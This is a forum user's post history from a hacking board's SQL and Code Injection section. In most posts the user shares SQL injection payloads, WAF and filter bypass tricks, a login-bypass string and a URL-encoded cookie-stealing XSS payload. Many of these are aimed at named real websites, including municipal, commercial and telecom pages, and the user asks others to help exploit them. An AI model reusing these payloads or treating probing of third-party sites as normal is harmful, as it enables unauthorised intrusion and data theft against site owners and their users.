Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 31
1 year ago
Nerder
Hello everybody, I found 2 different SQLIA in a website. The Sqlia is POST method type and affected the login form. The first one is: Type:boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: account=-4241' OR (1251=1251)#&password=test This one is pretty simple query, but return something strange, cause if i try for examp
Forum: SQL and Code Injection
1 year ago
Nerder
Welcome to .Blowbrain, this is a simple game of logic, encryption and hacking, which will be used to measure your skills in this specific fields. On the homepage you can get your own encrypted code. Your task is to decrypt this code, overcoming the difficulties you will find in your path. When you will find the solution, just click on the brain and use the form to send us the random nu
Forum: News and Links
1 year ago
Nerder
Great! But I wanna learn how can u do that. This Dir Trasversal is SICK!
Forum: SQL and Code Injection
1 year ago
Nerder
Hello everyone, Is couple of days that i try to exploit this webapplication, coded in perl. Someone already try to do something similar? I hope in a fast help. Thx in advance. This one is a simple dork, many website use this application and everyone have the same vulnz: http://goo.gl/cgnXG this is the error that i found: http://imgur.com/19kk2Q5 *Edit: correct some error.
Forum: SQL and Code Injection
1 year ago
Nerder
try to use -1 trim(union)%a0+trim(select)+1,2,3--
Forum: SQL and Code Injection
1 year ago
Nerder
2 years ago
Nerder
i have tried in this way but the Sqli dnt work: If u wanna try: www.ilmessaggero.it/dilloalmessaggero.php?ctc='1
Forum: SQL and Code Injection
2 years ago
Nerder
Hi, I have found a SQLI vulnz in a website, but the error that show me is: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 and 1=1, 20' at line 1" i think that the end of the query is for example: LIMIT $var ,20; if i try to insert some query, not work because there's a syntax error like th
Forum: SQL and Code Injection
2 years ago
Nerder
I have found some vulnz on this web site, contact me in private. bye
Forum: SQL and Code Injection
2 years ago
Nerder
http://www.costruttori.it/admin/ when i put a ' this page return: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 /admin/index.asp, line 23 its' vulnerable?
Forum: SQL and Code Injection
2 years ago
Nerder
nobody can solve?
Forum: SQL and Code Injection
2 years ago
Nerder
up PLS
Forum: SQL and Code Injection
2 years ago
Nerder
http://www.vizaginfo.com/others/edu/pgcolleges.asp?id='19 the BackEnd dbms is MySQL, but it's hard filtered. i try lot of way to bypass this, but for me it's really impossible! Thx Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
it's a BLIND. for bypass filter use /*!*/ bye.
Forum: SQL and Code Injection
2 years ago
Nerder
up please
Forum: SQL and Code Injection
2 years ago
Nerder
http://www.signal4you.com/index.php?option=com_content&task=view&id=926+and+1=1 http://www.signal4you.com/index.php?option=com_content&task=view&id=926+and+1=2 it's joomla CMS, and this variable is not vulnerable. search the joomla exploit in this website: http://www.joomlaexploit.com/ and test your web site. BYE! NERDER
Forum: SQL and Code Injection
2 years ago
Nerder
i try lot of way, but for me isn't vulnerable.... i'm sorry
Forum: SQL and Code Injection
2 years ago
Nerder
http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=2 http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=1 http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=0 How is it possible?
Forum: SQL and Code Injection
2 years ago
Nerder
there's lot of way to bypass captcha, try to search on yt, because there is different type of captcha and different way to bypass. Bye Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
i think that is vulnerable because when i try to put in the false codition such as AND 1=2 the page change http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=1 http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=2 and when i try to inject a "ORDER BY" +query http://assistenza.vodafone.it/content/sea
Forum: SQL and Code Injection
2 years ago
Nerder
i have try this simple way: http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='lol'/ http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='asd'/ I think that it's vulnerable but i'm not sure... Anyone could solve my question? Thx Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
In mysql v3 the UNION not exist...
Forum: SQL and Code Injection
2 years ago
Nerder
Siiick... this WAF was very hard! I try to bypass it for on day!!!
Forum: SQL and Code Injection
2 years ago
Nerder
I try a lot of ways, but for me it's not vuln... Ps: the server is very busy.
Forum: SQL and Code Injection
2 years ago
Nerder
its vuln, is a simple Error Based SQLIA... I have found lot of vulnz on this site and on this server. Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
hi, the sqlI is this: http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine='11 But it's sò so strange because when i tried to find the columns with ORDER BY, (http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine=11+order+by+1--) but the error that its printed was different from usual. But trying to increase the value of the variable "s_ordine, w
Forum: SQL and Code Injection
2 years ago
Nerder
Thx a Lot, I Dunno a lot of thing about Sql Injection in Opera DBMS.
Forum: SQL and Code Injection
2 years ago
Nerder
This is the vulnerable variable: www.comune.taranto.it/servizi/pagina.php?id=11238 I have tried many ways to bypassing filter, but none have been successful. the columns are 6: http://www.comune.taranto.it/servizi/pagina.php?id=1123+order+by+6-- http://www.comune.taranto.it/servizi/pagina.php?id=1123+order+by+7-- Help me Pls. Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
For me this form is not vulnerable at this type of Sql Injection, try other vars. I have find lot of this: ************************************************************* www.ptudep.org/regional-center1.asp?zone=Dist. of Faridkot, Mansa and Bathinda&rc_stream=IT%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%
Forum: SQL and Code Injection
2 years ago
Nerder
try username: admin password: 'or '1'='1'-- but is not guaranteed to work, this kind of bug is hard to find functional because it is one of the simplest types of sql injection, and is almost always fixed
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2